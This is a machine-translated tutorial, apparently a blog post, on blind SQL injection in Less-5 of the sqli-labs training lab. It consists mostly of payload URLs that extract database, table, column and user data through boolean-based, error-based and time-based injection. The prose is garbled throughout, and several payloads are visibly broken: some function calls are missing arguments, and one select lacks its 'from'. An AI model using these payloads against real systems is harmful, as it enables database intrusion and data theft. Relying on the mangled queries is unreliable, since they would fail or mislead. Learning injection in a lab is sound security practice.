Here to say, there are a lot of blog is translated or copy, this is the correct idea is the blind note. As you can see from the source code, when the run returns the correct result, you will only return the information in the database, so we cannot use the above Less1-4 method.
We begin by learning the blinds from this close. Combining the information of background-2, the above-mentioned payload can be used to show how to use it.
- try using left (Database (), 1)
Http://127.0.0.1/sqllib/Less-5/?id=1%27and%20left (Version (), 1) =5%23
Look at version (), the database has a revision number of 5.6.17, the statement here means that the first digit of the version number is not 5, the result of the obvious return is correct.
When the version number is incorrect, you will not be able to display it correctly.
Next look at the length of the database
Http://127.0.0.1/sqllib/Less-5/?id=1%27and%20length (Database ()) =8%23
A length of 8 o'clock returns the correct result, stating that the length is 8.
Guess the first bit of the database
Http://127.0.0.1/sqllib/Less-5/?id=1%27and%20left (Database (), 1)%3e%27a%27--+
Database () is security, so we see if his first bit is > A, which is obviously s > A, so it returns correctly. When we do not know, we can use dichotomy to improve the efficiency of injection.
?
Guess second bit of database
Knowing that the first bit is s, we see if the top two bits are greater than SA
Http://127.0.0.1/sqllib/Less-5/?id=1%27and%20left (Database (), 2)%3e%27sa%27--+
Down please extrapolate, because someone asked such questions, do not know how to carry out the second third place. There is only one time to talk about this problem, and we will not talk about it later. To have the ability and consciousness of self-thinking.
- Try using the substr () ASCII () function
ASCII (SUBSTR ((select table_name information_schema.tables where tables_schema=database () limit 0,1), 1, 1)) =101
Based on the knowledge that the database name is security, we use this method to obtain the table under the security database.
Gets the first character of the first table in the security database
Http://127.0.0.1/sqllib/Less-5/?id=1%27and%20ascii (substr (select%20table_name%20from%20information_ Schema.tables%20where%20table_schema=database ()%20limit%200,1))%3e80--+
Ps: Here table_schema can be written as = ' security ', but we use the database () here because the database () is security. The same test is done here using dichotomy until the test is correct.
This should be 101 because the first one represents email.
How do I get the second character of the first table?
Here we have learned about the substr () function, where substr (**,2,1) can be used.
Http://127.0.0.1/sqllib/Less-5/?id=1%27and%20ascii (substr (select%20table_name%20from%20information_ Schema.tables%20where%20table_schema=database ()%20limit%200,1), 2,1))%3e108--+
?
?
How do you get a second table? Think about it!
Here we can see the limit 0,1 used in the above statement. It means starting with the No. 0 one and getting the first one. The second one is the limit 1,1!
Http://127.0.0.1/sqllib/Less-5/?id=1%27and%20ascii (substr (select%20table_name%20from%20information_ Schema.tables%20where%20table_schema=database ()%20limit%201,1))%3e113--+
Here 113 returns is correct, because the second represents the Referers table, so the first bit is R.
The next process is to constantly repeat the above, here do not repeat the building of wheels. The principle has been explained clearly.
When you are done with the method, you can get the names of all the tables.
- Use regexp to get (2) the columns in the Users table
Http://127.0.0.1/sqllib/Less-5/?id=1%27%20and%201= (select%201%20from%20information_schema.columns%20where% 20table_name=%27users%27%20and%20table_name%20regexp%20%27^us[a-z]%27%20limit%200,1)--+
The above statement selects whether column names in the Users table have us** columns
Http://127.0.0.1/sqllib/Less-5/?id=1 ' and 1= (select 1 from information_schema.columns where table_name= ' users ' and column_name regexp ' ^username ' limit 0,1)--+
You can see that username exists. We can replace the username with other items such as password.
?
- Get the contents of the Users table using the Ord () and mid () functions
Http://127.0.0.1/sqllib/Less-5/?id=1%27%20and%20ORD (MID (Select%20ifnull (CAST (Username%20as%20char), 0x20) from% 20security.users%20order%20by%20id%20limit%200,1), 1, 1) =68--+
Gets the contents of the Users table. Gets the ASCII of the first character of the first line in username, compared to 68, which is D. And we know from the table that the first row of data is dumb. So the next step is to make the wheels again.
?
Summary: Above (1) (2) (3) (4) We have demonstrated this by using a different statement for all payload of the Boolean blind SQL. The SQL Boolean blind statement must be more familiar and understandable through an instance.
?
Next, we demonstrate error injection and delay injection.
(5) First Use error injection
Http://127.0.0.1/sqllib/Less-5/?id=1 ' Union Select 1,count (*), concat (0x3a,0x3a, (Select User ()), 0x3a,0x3a,floor ( RAND (0) *) A from Information_schema.columns group by a--+
?
error injection with double numeric type out of range
Http://127.0.0.1/sqllib/Less-5/?id=1 ' Union SELECT (exp (~ (SELECT * FROM (select USER ()) a)), 2,3--+
Using bigint overflow for error injection
Http://127.0.0.1/sqllib/Less-5/?id=1 ' Union Select (! ( SELECT * FROM (select User ()) x)-~0), 2,3--+
XPath function error injection
Http://127.0.0.1/sqllib/Less-5/?id=1 ' and Extractvalue (1,concat (0x7e, (select @ @version), 0x7e))--+
Http://127.0.0.1/sqllib/Less-5/?id=1 ' and Updatexml (1,concat (0x7e, (select @ @version), 0x7e), 1)--+
Take advantage of the repeatability of data
Http://127.0.0.1/sqllib/Less-5/?id=1 ' Union select Name_const from (Version (), 1), Name_const (version (), 1 )) x--+
- Delay injection
Injection using the sleep () function
Http://127.0.0.1/sqllib/Less-5/?id=1 ' and If (ASCII (substr (Database (),)) =115,1,sleep (5))--+
There is a 5-second time delay when the error occurs.
Delay injection with Benchmark ()
Http://127.0.0.1/sqllib/Less-5/?id=1 ' UNION SELECT (IF (SUBSTRING (current,1,1) =char (), BENCHMARK (50000000,encode (' MSG ', ' by 5 seconds '), null), 2,3 from (select Database () as current) as tb1--+
When the results are correct, running encode (' MSG ', ' by 5 seconds ') operates 50 million times and takes a while.
?
?
At this point, we have already demonstrated the use of the blinds described above in less5. In the subsequent levels, you will pick one for the demo, and other blind methods please refer to LESS5.